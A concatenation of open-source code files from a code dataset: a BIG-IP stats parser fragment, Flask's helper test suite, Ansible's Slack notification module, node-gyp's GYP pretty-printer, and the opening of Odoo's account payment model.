<base_uri>/~<partition>~<<name>.app>~<name>
:param base_uri: str -- base uri of the REST endpoint
:param partition: str -- partition for the service
:param name: str -- name of the service
:returns: str -- uri to access the service
"""
name = name.replace('/', '~')
return '%s~%s~%s.app~%s' % (base_uri, partition, name, name)
def parseStats(entry):
if 'description' in entry:
return entry['description']
elif 'value' in entry:
return entry['value']
elif 'entries' in entry or 'nestedStats' in entry and 'entries' in entry['nestedStats']:
if 'entries' in entry:
entries = entry['entries']
else:
entries = entry['nestedStats']['entries']
result = None
for name in entries:
entry = entries[name]
if 'https://localhost' in name:
name = name.split('/')
name = name[-1]
if result and isinstance(result, list):
result.append(parseStats(entry))
elif result and isinstance(result, dict):
result[name] = parseStats(entry)
else:
try:
int(name)
result = list()
result.append(parseStats(entry))
except ValueError:
result = dict()
result[name] = parseStats(entry)
else:
if '.' in name:
names = name.split('.')
key = names[0]
value = names[1]
if result is None:
# result can be None if this branch is reached first
#
# For example, the mgmt/tm/net/trunk/NAME/stats API
# returns counters.bitsIn before anything else.
result = dict()
result[key] = dict()
elif key not in result:
result[key] = dict()
elif result[key] is None:
result[key] = dict()
result[key][value] = parseStats(entry)
else:
if result and isinstance(result, list):
result.append(parseStats(entry))
elif result and isinstance(result, dict):
result[name] = parseStats(entry)
else:
try:
int(name)
result = list()
result.append(parseStats(entry))
except ValueError:
result = dict()
result[name] = parseStats(entry)
return result
| gpl-3.0 |
i5on9i/echoserver | lib/flask/testsuite/helpers.py | 146 | 21657 | # -*- coding: utf-8 -*-
"""
flask.testsuite.helpers
~~~~~~~~~~~~~~~~~~~~~~~
Various helpers.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import flask
import unittest
from logging import StreamHandler
from flask.testsuite import FlaskTestCase, catch_warnings, catch_stderr
from werkzeug.http import parse_cache_control_header, parse_options_header
from flask._compat import StringIO, text_type
def has_encoding(name):
try:
import codecs
codecs.lookup(name)
return True
except LookupError:
return False
class JSONTestCase(FlaskTestCase):
def test_json_bad_requests(self):
app = flask.Flask(__name__)
@app.route('/json', methods=['POST'])
def return_json():
return flask.jsonify(foo=text_type(flask.request.get_json()))
c = app.test_client()
rv = c.post('/json', data='malformed', content_type='application/json')
self.assert_equal(rv.status_code, 400)
def test_json_body_encoding(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
return flask.request.get_json()
c = app.test_client()
resp = c.get('/', data=u'"Hällo Wörld"'.encode('iso-8859-15'),
content_type='application/json; charset=iso-8859-15')
self.assert_equal(resp.data, u'Hällo Wörld'.encode('utf-8'))
def test_jsonify(self):
d = dict(a=23, b=42, c=[1, 2, 3])
app = flask.Flask(__name__)
@app.route('/kw')
def return_kwargs():
return flask.jsonify(**d)
@app.route('/dict')
def return_dict():
return flask.jsonify(d)
c = app.test_client()
for url in '/kw', '/dict':
rv = c.get(url)
self.assert_equal(rv.mimetype, 'application/json')
self.assert_equal(flask.json.loads(rv.data), d)
def test_json_as_unicode(self):
app = flask.Flask(__name__)
app.config['JSON_AS_ASCII'] = True
with app.app_context():
rv = flask.json.dumps(u'\N{SNOWMAN}')
self.assert_equal(rv, '"\\u2603"')
app.config['JSON_AS_ASCII'] = False
with app.app_context():
rv = flask.json.dumps(u'\N{SNOWMAN}')
self.assert_equal(rv, u'"\u2603"')
def test_json_attr(self):
app = flask.Flask(__name__)
@app.route('/add', methods=['POST'])
def add():
json = flask.request.get_json()
return text_type(json['a'] + json['b'])
c = app.test_client()
rv = c.post('/add', data=flask.json.dumps({'a': 1, 'b': 2}),
content_type='application/json')
self.assert_equal(rv.data, b'3')
def test_template_escaping(self):
app = flask.Flask(__name__)
render = flask.render_template_string
with app.test_request_context():
rv = flask.json.htmlsafe_dumps('</script>')
self.assert_equal(rv, u'"\\u003c/script\\u003e"')
self.assert_equal(type(rv), text_type)
rv = render('{{ "</script>"|tojson }}')
self.assert_equal(rv, '"\\u003c/script\\u003e"')
rv = render('{{ "<\0/script>"|tojson }}')
self.assert_equal(rv, '"\\u003c\\u0000/script\\u003e"')
rv = render('{{ "<!--<script>"|tojson }}')
self.assert_equal(rv, '"\\u003c!--\\u003cscript\\u003e"')
rv = render('{{ "&"|tojson }}')
self.assert_equal(rv, '"\\u0026"')
def test_json_customization(self):
class X(object):
def __init__(self, val):
self.val = val
class MyEncoder(flask.json.JSONEncoder):
def default(self, o):
if isinstance(o, X):
return '<%d>' % o.val
return flask.json.JSONEncoder.default(self, o)
class MyDecoder(flask.json.JSONDecoder):
def __init__(self, *args, **kwargs):
kwargs.setdefault('object_hook', self.object_hook)
flask.json.JSONDecoder.__init__(self, *args, **kwargs)
def object_hook(self, obj):
if len(obj) == 1 and '_foo' in obj:
return X(obj['_foo'])
return obj
app = flask.Flask(__name__)
app.testing = True
app.json_encoder = MyEncoder
app.json_decoder = MyDecoder
@app.route('/', methods=['POST'])
def index():
return flask.json.dumps(flask.request.get_json()['x'])
c = app.test_client()
rv = c.post('/', data=flask.json.dumps({
'x': {'_foo': 42}
}), content_type='application/json')
self.assertEqual(rv.data, b'"<42>"')
def test_modified_url_encoding(self):
class ModifiedRequest(flask.Request):
url_charset = 'euc-kr'
app = flask.Flask(__name__)
app.testing = True
app.request_class = ModifiedRequest
app.url_map.charset = 'euc-kr'
@app.route('/')
def index():
return flask.request.args['foo']
rv = app.test_client().get(u'/?foo=정상처리'.encode('euc-kr'))
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, u'정상처리'.encode('utf-8'))
if not has_encoding('euc-kr'):
test_modified_url_encoding = None
def test_json_key_sorting(self):
app = flask.Flask(__name__)
app.testing = True
self.assert_equal(app.config['JSON_SORT_KEYS'], True)
d = dict.fromkeys(range(20), 'foo')
@app.route('/')
def index():
return flask.jsonify(values=d)
c = app.test_client()
rv = c.get('/')
lines = [x.strip() for x in rv.data.strip().decode('utf-8').splitlines()]
self.assert_equal(lines, [
'{',
'"values": {',
'"0": "foo",',
'"1": "foo",',
'"2": "foo",',
'"3": "foo",',
'"4": "foo",',
'"5": "foo",',
'"6": "foo",',
'"7": "foo",',
'"8": "foo",',
'"9": "foo",',
'"10": "foo",',
'"11": "foo",',
'"12": "foo",',
'"13": "foo",',
'"14": "foo",',
'"15": "foo",',
'"16": "foo",',
'"17": "foo",',
'"18": "foo",',
'"19": "foo"',
'}',
'}'
])
class SendfileTestCase(FlaskTestCase):
def test_send_file_regular(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.send_file('static/index.html')
self.assert_true(rv.direct_passthrough)
self.assert_equal(rv.mimetype, 'text/html')
with app.open_resource('static/index.html') as f:
rv.direct_passthrough = False
self.assert_equal(rv.data, f.read())
rv.close()
def test_send_file_xsendfile(self):
app = flask.Flask(__name__)
app.use_x_sendfile = True
with app.test_request_context():
rv = flask.send_file('static/index.html')
self.assert_true(rv.direct_passthrough)
self.assert_in('x-sendfile', rv.headers)
self.assert_equal(rv.headers['x-sendfile'],
os.path.join(app.root_path, 'static/index.html'))
self.assert_equal(rv.mimetype, 'text/html')
rv.close()
def test_send_file_object(self):
app = flask.Flask(__name__)
with catch_warnings() as captured:
with app.test_request_context():
f = open(os.path.join(app.root_path, 'static/index.html'))
rv = flask.send_file(f)
rv.direct_passthrough = False
with app.open_resource('static/index.html') as f:
self.assert_equal(rv.data, f.read())
self.assert_equal(rv.mimetype, 'text/html')
rv.close()
# mimetypes + etag
self.assert_equal(len(captured), 2)
app.use_x_sendfile = True
with catch_warnings() as captured:
with app.test_request_context():
f = open(os.path.join(app.root_path, 'static/index.html'))
rv = flask.send_file(f)
self.assert_equal(rv.mimetype, 'text/html')
self.assert_in('x-sendfile', rv.headers)
self.assert_equal(rv.headers['x-sendfile'],
os.path.join(app.root_path, 'static/index.html'))
rv.close()
# mimetypes + etag
self.assert_equal(len(captured), 2)
app.use_x_sendfile = False
with app.test_request_context():
with catch_warnings() as captured:
f = StringIO('Test')
rv = flask.send_file(f)
rv.direct_passthrough = False
self.assert_equal(rv.data, b'Test')
self.assert_equal(rv.mimetype, 'application/octet-stream')
rv.close()
# etags
self.assert_equal(len(captured), 1)
with catch_warnings() as captured:
f = StringIO('Test')
rv = flask.send_file(f, mimetype='text/plain')
rv.direct_passthrough = False
self.assert_equal(rv.data, b'Test')
self.assert_equal(rv.mimetype, 'text/plain')
rv.close()
# etags
self.assert_equal(len(captured), 1)
app.use_x_sendfile = True
with catch_warnings() as captured:
with app.test_request_context():
f = StringIO('Test')
rv = flask.send_file(f)
self.assert_not_in('x-sendfile', rv.headers)
rv.close()
# etags
self.assert_equal(len(captured), 1)
def test_attachment(self):
app = flask.Flask(__name__)
with catch_warnings() as captured:
with app.test_request_context():
f = open(os.path.join(app.root_path, 'static/index.html'))
rv = flask.send_file(f, as_attachment=True)
value, options = parse_options_header(rv.headers['Content-Disposition'])
self.assert_equal(value, 'attachment')
rv.close()
# mimetypes + etag
self.assert_equal(len(captured), 2)
with app.test_request_context():
self.assert_equal(options['filename'], 'index.html')
rv = flask.send_file('static/index.html', as_attachment=True)
value, options = parse_options_header(rv.headers['Content-Disposition'])
self.assert_equal(value, 'attachment')
self.assert_equal(options['filename'], 'index.html')
rv.close()
with app.test_request_context():
rv = flask.send_file(StringIO('Test'), as_attachment=True,
attachment_filename='index.txt',
add_etags=False)
self.assert_equal(rv.mimetype, 'text/plain')
value, options = parse_options_header(rv.headers['Content-Disposition'])
self.assert_equal(value, 'attachment')
self.assert_equal(options['filename'], 'index.txt')
rv.close()
def test_static_file(self):
app = flask.Flask(__name__)
# default cache timeout is 12 hours
with app.test_request_context():
# Test with static file handler.
rv = app.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 12 * 60 * 60)
rv.close()
# Test again with direct use of send_file utility.
rv = flask.send_file('static/index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 12 * 60 * 60)
rv.close()
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 3600
with app.test_request_context():
# Test with static file handler.
rv = app.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 3600)
rv.close()
# Test again with direct use of send_file utility.
rv = flask.send_file('static/index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 3600)
rv.close()
class StaticFileApp(flask.Flask):
def get_send_file_max_age(self, filename):
return 10
app = StaticFileApp(__name__)
with app.test_request_context():
# Test with static file handler.
rv = app.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 10)
rv.close()
# Test again with direct use of send_file utility.
rv = flask.send_file('static/index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 10)
rv.close()
class LoggingTestCase(FlaskTestCase):
def test_logger_cache(self):
app = flask.Flask(__name__)
logger1 = app.logger
self.assert_true(app.logger is logger1)
self.assert_equal(logger1.name, __name__)
app.logger_name = __name__ + '/test_logger_cache'
self.assert_true(app.logger is not logger1)
def test_debug_log(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/')
def index():
app.logger.warning('the standard library is dead')
app.logger.debug('this is a debug statement')
return ''
@app.route('/exc')
def exc():
1 // 0
with app.test_client() as c:
with catch_stderr() as err:
c.get('/')
out = err.getvalue()
self.assert_in('WARNING in helpers [', out)
self.assert_in(os.path.basename(__file__.rsplit('.', 1)[0] + '.py'), out)
self.assert_in('the standard library is dead', out)
self.assert_in('this is a debug statement', out)
with catch_stderr() as err:
try:
c.get('/exc')
except ZeroDivisionError:
pass
else:
self.assert_true(False, 'debug log ate the exception')
def test_debug_log_override(self):
app = flask.Flask(__name__)
app.debug = True
app.logger_name = 'flask_tests/test_debug_log_override'
app.logger.level = 10
self.assert_equal(app.logger.level, 10)
def test_exception_logging(self):
out = StringIO()
app = flask.Flask(__name__)
app.logger_name = 'flask_tests/test_exception_logging'
app.logger.addHandler(StreamHandler(out))
@app.route('/')
def index():
1 // 0
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 500)
self.assert_in(b'Internal Server Error', rv.data)
err = out.getvalue()
self.assert_in('Exception on / [GET]', err)
self.assert_in('Traceback (most recent call last):', err)
self.assert_in('1 // 0', err)
self.assert_in('ZeroDivisionError:', err)
def test_processor_exceptions(self):
app = flask.Flask(__name__)
@app.before_request
def before_request():
if trigger == 'before':
1 // 0
@app.after_request
def after_request(response):
if trigger == 'after':
1 // 0
return response
@app.route('/')
def index():
return 'Foo'
@app.errorhandler(500)
def internal_server_error(e):
return 'Hello Server Error', 500
for trigger in 'before', 'after':
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 500)
self.assert_equal(rv.data, b'Hello Server Error')
def test_url_for_with_anchor(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return '42'
with app.test_request_context():
self.assert_equal(flask.url_for('index', _anchor='x y'),
'/#x%20y')
def test_url_for_with_scheme(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return '42'
with app.test_request_context():
self.assert_equal(flask.url_for('index',
_external=True,
_scheme='https'),
'https://localhost/')
def test_url_for_with_scheme_not_external(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return '42'
with app.test_request_context():
self.assert_raises(ValueError,
flask.url_for,
'index',
_scheme='https')
def test_url_with_method(self):
from flask.views import MethodView
app = flask.Flask(__name__)
class MyView(MethodView):
def get(self, id=None):
if id is None:
return 'List'
return 'Get %d' % id
def post(self):
return 'Create'
myview = MyView.as_view('myview')
app.add_url_rule('/myview/', methods=['GET'],
view_func=myview)
app.add_url_rule('/myview/<int:id>', methods=['GET'],
view_func=myview)
app.add_url_rule('/myview/create', methods=['POST'],
view_func=myview)
with app.test_request_context():
self.assert_equal(flask.url_for('myview', _method='GET'),
'/myview/')
self.assert_equal(flask.url_for('myview', id=42, _method='GET'),
'/myview/42')
self.assert_equal(flask.url_for('myview', _method='POST'),
'/myview/create')
class NoImportsTestCase(FlaskTestCase):
"""Test Flasks are created without import.
Avoiding ``__import__`` helps create Flask instances where there are errors
at import time. Those runtime errors will be apparent to the user soon
enough, but tools which build Flask instances meta-programmatically benefit
from a Flask which does not ``__import__``. Instead of importing to
retrieve file paths or metadata on a module or package, use the pkgutil and
imp modules in the Python standard library.
"""
def test_name_with_import_error(self):
try:
flask.Flask('importerror')
except NotImplementedError:
self.fail('Flask(import_name) is importing import_name.')
class StreamingTestCase(FlaskTestCase):
def test_streaming_with_context(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
def generate():
yield 'Hello '
yield flask.request.args['name']
yield '!'
return flask.Response(flask.stream_with_context(generate()))
c = app.test_client()
rv = c.get('/?name=World')
self.assertEqual(rv.data, b'Hello World!')
def test_streaming_with_context_as_decorator(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
@flask.stream_with_context
def generate():
yield 'Hello '
yield flask.request.args['name']
yield '!'
return flask.Response(generate())
c = app.test_client()
rv = c.get('/?name=World')
self.assertEqual(rv.data, b'Hello World!')
def test_streaming_with_context_and_custom_close(self):
app = flask.Flask(__name__)
app.testing = True
called = []
class Wrapper(object):
def __init__(self, gen):
self._gen = gen
def __iter__(self):
return self
def close(self):
called.append(42)
def __next__(self):
return next(self._gen)
next = __next__
@app.route('/')
def index():
def generate():
yield 'Hello '
yield flask.request.args['name']
yield '!'
return flask.Response(flask.stream_with_context(
Wrapper(generate())))
c = app.test_client()
rv = c.get('/?name=World')
self.assertEqual(rv.data, b'Hello World!')
self.assertEqual(called, [42])
def suite():
suite = unittest.TestSuite()
if flask.json_available:
suite.addTest(unittest.makeSuite(JSONTestCase))
suite.addTest(unittest.makeSuite(SendfileTestCase))
suite.addTest(unittest.makeSuite(LoggingTestCase))
suite.addTest(unittest.makeSuite(NoImportsTestCase))
suite.addTest(unittest.makeSuite(StreamingTestCase))
return suite
| apache-2.0 |
m2candre/ansible-modules-extras | notification/slack.py | 61 | 7655 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Ramon de la Fuente <ramon@delafuente.nl>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
module: slack
short_description: Send Slack notifications
description:
- The M(slack) module sends notifications to U(http://slack.com) via the Incoming WebHook integration
version_added: 1.6
author: "Ramon de la Fuente (@ramondelafuente)"
options:
domain:
description:
- Slack (sub)domain for your environment without protocol. (i.e.
C(future500.slack.com)) In 1.8 and beyond, this is deprecated and may
be ignored. See token documentation for information.
required: false
token:
description:
- Slack integration token. This authenticates you to the slack service.
Prior to 1.8, a token looked like C(3Ffe373sfhRE6y42Fg3rvf4GlK). In
1.8 and above, ansible adapts to the new slack API where tokens look
like C(G922VJP24/D921DW937/3Ffe373sfhRE6y42Fg3rvf4GlK). If tokens
are in the new format then slack will ignore any value of domain. If
the token is in the old format the domain is required. Ansible has no
control of when slack will get rid of the old API. When slack does
that the old format will stop working.
required: true
msg:
description:
- Message to send.
required: true
channel:
description:
- Channel to send the message to. If absent, the message goes to the channel selected for the I(token).
required: false
username:
description:
- This is the sender of the message.
required: false
default: ansible
icon_url:
description:
- Url for the message sender's icon (default C(http://www.ansible.com/favicon.ico))
required: false
icon_emoji:
description:
- Emoji for the message sender. See Slack documentation for options.
(if I(icon_emoji) is set, I(icon_url) will not be used)
required: false
link_names:
description:
- Automatically create links for channels and usernames in I(msg).
required: false
default: 1
choices:
- 1
- 0
parse:
description:
- Setting for the message parser at Slack
required: false
choices:
- 'full'
- 'none'
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices:
- 'yes'
- 'no'
color:
version_added: 2.0
description:
- Allow text to use default colors - use the default of 'normal' to not send a custom color bar at the start of the message
required: false
default: 'normal'
choices:
- 'normal'
- 'good'
- 'warning'
- 'danger'
"""
EXAMPLES = """
- name: Send notification message via Slack
local_action:
module: slack
domain: future500.slack.com
token: thetokengeneratedbyslack
msg: "{{ inventory_hostname }} completed"
- name: Send notification message via Slack all options
local_action:
module: slack
domain: future500.slack.com
token: thetokengeneratedbyslack
msg: "{{ inventory_hostname }} completed"
channel: "#ansible"
username: "Ansible on {{ inventory_hostname }}"
icon_url: "http://www.example.com/some-image-file.png"
link_names: 0
parse: 'none'
- name: insert a color bar in front of the message for visibility purposes and use the default webhook icon and name configured in Slack
slack:
domain: future500.slack.com
token: thetokengeneratedbyslack
msg: "{{ inventory_hostname }} is alive!"
color: good
username: ""
icon_url: ""
"""
OLD_SLACK_INCOMING_WEBHOOK = 'https://%s/services/hooks/incoming-webhook?token=%s'
SLACK_INCOMING_WEBHOOK = 'https://hooks.slack.com/services/%s'
def build_payload_for_slack(module, text, channel, username, icon_url, icon_emoji, link_names, parse, color):
if color == 'normal':
payload = dict(text=text)
else:
payload = dict(attachments=[dict(text=text, color=color)])
if channel is not None:
if (channel[0] == '#') or (channel[0] == '@'):
payload['channel'] = channel
else:
payload['channel'] = '#'+channel
if username is not None:
payload['username'] = username
if icon_emoji is not None:
payload['icon_emoji'] = icon_emoji
else:
payload['icon_url'] = icon_url
if link_names is not None:
payload['link_names'] = link_names
if parse is not None:
payload['parse'] = parse
payload="payload=" + module.jsonify(payload)
return payload
def do_notify_slack(module, domain, token, payload):
if token.count('/') >= 2:
# New style token
slack_incoming_webhook = SLACK_INCOMING_WEBHOOK % (token)
else:
if not domain:
module.fail_json(msg="Slack has updated its webhook API. You need to specify a token of the form XXXX/YYYY/ZZZZ in your playbook")
slack_incoming_webhook = OLD_SLACK_INCOMING_WEBHOOK % (domain, token)
response, info = fetch_url(module, slack_incoming_webhook, data=payload)
if info['status'] != 200:
obscured_incoming_webhook = SLACK_INCOMING_WEBHOOK % ('[obscured]')
module.fail_json(msg=" failed to send %s to %s: %s" % (payload, obscured_incoming_webhook, info['msg']))
def main():
module = AnsibleModule(
argument_spec = dict(
domain = dict(type='str', required=False, default=None),
token = dict(type='str', required=True, no_log=True),
msg = dict(type='str', required=True),
channel = dict(type='str', default=None),
username = dict(type='str', default='Ansible'),
icon_url = dict(type='str', default='http://www.ansible.com/favicon.ico'),
icon_emoji = dict(type='str', default=None),
link_names = dict(type='int', default=1, choices=[0,1]),
parse = dict(type='str', default=None, choices=['none', 'full']),
validate_certs = dict(default='yes', type='bool'),
color = dict(type='str', default='normal', choices=['normal', 'good', 'warning', 'danger'])
)
)
domain = module.params['domain']
token = module.params['token']
text = module.params['msg']
channel = module.params['channel']
username = module.params['username']
icon_url = module.params['icon_url']
icon_emoji = module.params['icon_emoji']
link_names = module.params['link_names']
parse = module.params['parse']
color = module.params['color']
payload = build_payload_for_slack(module, text, channel, username, icon_url, icon_emoji, link_names, parse, color)
do_notify_slack(module, domain, token, payload)
module.exit_json(msg="OK")
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
main()
| gpl-3.0 |
RajeevG96/Portfolio-Website | node_modules/node-gyp/gyp/tools/pretty_gyp.py | 2618 | 4756 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Pretty-prints the contents of a GYP file."""
import sys
import re
# Regex to remove comments when we're counting braces.
COMMENT_RE = re.compile(r'\s*#.*')
# Regex to remove quoted strings when we're counting braces.
# It takes into account quoted quotes, and makes sure that the quotes match.
# NOTE: It does not handle quotes that span more than one line, or
# cases where an escaped quote is preceeded by an escaped backslash.
QUOTE_RE_STR = r'(?P<q>[\'"])(.*?)(?<![^\\][\\])(?P=q)'
QUOTE_RE = re.compile(QUOTE_RE_STR)
def comment_replace(matchobj):
return matchobj.group(1) + matchobj.group(2) + '#' * len(matchobj.group(3))
def mask_comments(input):
"""Mask the quoted strings so we skip braces inside quoted strings."""
search_re = re.compile(r'(.*?)(#)(.*)')
return [search_re.sub(comment_replace, line) for line in input]
def quote_replace(matchobj):
return "%s%s%s%s" % (matchobj.group(1),
matchobj.group(2),
'x'*len(matchobj.group(3)),
matchobj.group(2))
def mask_quotes(input):
"""Mask the quoted strings so we skip braces inside quoted strings."""
search_re = re.compile(r'(.*?)' + QUOTE_RE_STR)
return [search_re.sub(quote_replace, line) for line in input]
def do_split(input, masked_input, search_re):
output = []
mask_output = []
for (line, masked_line) in zip(input, masked_input):
m = search_re.match(masked_line)
while m:
split = len(m.group(1))
line = line[:split] + r'\n' + line[split:]
masked_line = masked_line[:split] + r'\n' + masked_line[split:]
m = search_re.match(masked_line)
output.extend(line.split(r'\n'))
mask_output.extend(masked_line.split(r'\n'))
return (output, mask_output)
def split_double_braces(input):
"""Masks out the quotes and comments, and then splits appropriate
lines (lines that matche the double_*_brace re's above) before
indenting them below.
These are used to split lines which have multiple braces on them, so
that the indentation looks prettier when all laid out (e.g. closing
braces make a nice diagonal line).
"""
double_open_brace_re = re.compile(r'(.*?[\[\{\(,])(\s*)([\[\{\(])')
double_close_brace_re = re.compile(r'(.*?[\]\}\)],?)(\s*)([\]\}\)])')
masked_input = mask_quotes(input)
masked_input = mask_comments(masked_input)
(output, mask_output) = do_split(input, masked_input, double_open_brace_re)
(output, mask_output) = do_split(output, mask_output, double_close_brace_re)
return output
def count_braces(line):
"""keeps track of the number of braces on a given line and returns the result.
It starts at zero and subtracts for closed braces, and adds for open braces.
"""
open_braces = ['[', '(', '{']
close_braces = [']', ')', '}']
closing_prefix_re = re.compile(r'(.*?[^\s\]\}\)]+.*?)([\]\}\)],?)\s*$')
cnt = 0
stripline = COMMENT_RE.sub(r'', line)
stripline = QUOTE_RE.sub(r"''", stripline)
for char in stripline:
for brace in open_braces:
if char == brace:
cnt += 1
for brace in close_braces:
if char == brace:
cnt -= 1
after = False
if cnt > 0:
after = True
# This catches the special case of a closing brace having something
# other than just whitespace ahead of it -- we don't want to
# unindent that until after this line is printed so it stays with
# the previous indentation level.
if cnt < 0 and closing_prefix_re.match(stripline):
after = True
return (cnt, after)
def prettyprint_input(lines):
"""Does the main work of indenting the input based on the brace counts."""
indent = 0
basic_offset = 2
last_line = ""
for line in lines:
if COMMENT_RE.match(line):
print line
else:
line = line.strip('\r\n\t ') # Otherwise doesn't strip \r on Unix.
if len(line) > 0:
(brace_diff, after) = count_braces(line)
if brace_diff != 0:
if after:
print " " * (basic_offset * indent) + line
indent += brace_diff
else:
indent += brace_diff
print " " * (basic_offset * indent) + line
else:
print " " * (basic_offset * indent) + line
else:
print ""
last_line = line
def main():
if len(sys.argv) > 1:
data = open(sys.argv[1]).read().splitlines()
else:
data = sys.stdin.read().splitlines()
# Split up the double braces.
lines = split_double_braces(data)
# Indent and print the output.
prettyprint_input(lines)
return 0
if __name__ == '__main__':
sys.exit(main())
| mit |
pepetreshere/odoo | addons/account/models/account_payment.py | 1 | 39985 | # -*- coding: utf-8 -*-
from odoo import models, fields, api, _
from odoo.exceptions import UserError, ValidationError
class AccountPaymentMethod(models.Model):
_name = "account.payment.method"
_description = "Payment Methods"
_order = 'sequence'
name = fields.Char(required=True, translate=True)
code = fields.Char(required=True) # For internal identification
payment_type = fields.Selection([('inbound', 'Inbound'), ('outbound', 'Outbound')], required=True)
sequence = fields.Integer(help='Used to order Methods in the form view', default=10)
class AccountPayment(models.Model):
_name = "account.payment"
_inherits = {'account.move': 'move_id'}
_inherit = ['mail.thread', 'mail.activity.mixin']
_description = "Payments"
_order = "date desc, name desc"
_check_company_auto = True
def _get_default_journal(self):
''' Retrieve the default journal for the account.payment.
/!\ This method will not override the method in 'account.move' because the ORM
doesn't allow overriding methods using _inherits. Then, this method will be called
manually in 'create' and 'new'.
:return: An account.journal record.
'''
return self.env['account.move']._search_default_journal(('bank', 'cash'))
# == Business fields ==
move_id = fields.Many2one(
comodel_name='account.move',
string='Journal Entry', required=True, readonly=True, ondelete='cascade',
check_company=True)
is_reconciled = fields.Boolean(string="Is Reconciled", store=True,
compute='_compute_reconciliation_status',
help="Technical field indicating if the payment is already reconciled.")
is_matched = fields.Boolean(string="Is Matched With a Bank Statement", store=True,
compute='_compute_reconciliation_status',
help="Technical field indicating if the payment has been matched with a statement line.")
partner_bank_id = fields.Many2one('res.partner.bank', string="Recipient Bank Account",
readonly=False, store=True,
compute='_compute_partner_bank_id',
domain="[('partner_id', '=', partner_id)]",
check_company=True)
is_internal_transfer = fields.Boolean(string="Is Internal Transfer",
readonly=False, store=True,
compute="_compute_is_internal_transfer")
qr_code = fields.Char(string="QR Code",
compute="_compute_qr_code",
help="QR-code report URL to use to generate the QR-code to scan with a banking app to perform this payment.")
# == Payment methods fields ==
payment_method_id = fields.Many2one('account.payment.method', string='Payment Method',
readonly=False, store=True,
compute='_compute_payment_method_id',
domain="[('id', 'in', available_payment_method_ids)]",
help="Manual: Get paid by cash, check or any other method outside of Odoo.\n"\
"Electronic: Get paid automatically through a payment acquirer by requesting a transaction on a card saved by the customer when buying or subscribing online (payment token).\n"\
"Check: Pay bill by check and print it from Odoo.\n"\
"Batch Deposit: Encase several customer checks at once by generating a batch deposit to submit to your bank. When encoding the bank statement in Odoo, you are suggested to reconcile the transaction with the batch deposit.To enable batch deposit, module account_batch_payment must be installed.\n"\
"SEPA Credit Transfer: Pay bill from a SEPA Credit Transfer file you submit to your bank. To enable sepa credit transfer, module account_sepa must be installed ")
available_payment_method_ids = fields.Many2many('account.payment.method',
compute='_compute_payment_method_fields')
hide_payment_method = fields.Boolean(
compute='_compute_payment_method_fields',
help="Technical field used to hide the payment method if the selected journal has only one available which is 'manual'")
# == Synchronized fields with the account.move.lines ==
amount = fields.Monetary(currency_field='currency_id')
payment_type = fields.Selection([
('outbound', 'Send Money'),
('inbound', 'Receive Money'),
], string='Payment Type', default='inbound', required=True)
partner_type = fields.Selection([
('customer', 'Customer'),
('supplier', 'Vendor'),
], default='customer', tracking=True, required=True)
payment_reference = fields.Char(string="Payment Reference", copy=False,
help="Reference of the document used to issue this payment. Eg. check number, file name, etc.")
currency_id = fields.Many2one('res.currency', string='Currency', store=True, readonly=False,
compute='_compute_currency_id',
help="The payment's currency.")
partner_id = fields.Many2one(
comodel_name='res.partner',
string="Customer/Vendor",
store=True, readonly=False, ondelete='restrict',
compute='_compute_partner_id',
domain="['|', ('parent_id','=', False), ('is_company','=', True)]",
check_company=True)
destination_account_id = fields.Many2one(
comodel_name='account.account',
string='Destination Account',
store=True, readonly=False,
compute='_compute_destination_account_id',
domain="[('user_type_id.type', 'in', ('receivable', 'payable')), ('company_id', '=', company_id)]",
check_company=True)
# == Stat buttons ==
reconciled_invoice_ids = fields.Many2many('account.move', string="Reconciled Invoices",
compute='_compute_stat_buttons_from_reconciliation',
help="Invoices whose journal items have been reconciled with these payments.")
reconciled_invoices_count = fields.Integer(string="# Reconciled Invoices",
compute="_compute_stat_buttons_from_reconciliation")
reconciled_bill_ids = fields.Many2many('account.move', string="Reconciled Bills",
compute='_compute_stat_buttons_from_reconciliation',
help="Invoices whose journal items have been reconciled with these payments.")
reconciled_bills_count = fields.Integer(string="# Reconciled Bills",
compute="_compute_stat_buttons_from_reconciliation")
reconciled_statement_ids = fields.Many2many('account.move', string="Reconciled Statements",
compute='_compute_stat_buttons_from_reconciliation',
help="Statements matched to this payment")
reconciled_statements_count = fields.Integer(string="# Reconciled Statements",
compute="_compute_stat_buttons_from_reconciliation")
# == Display purpose fields ==
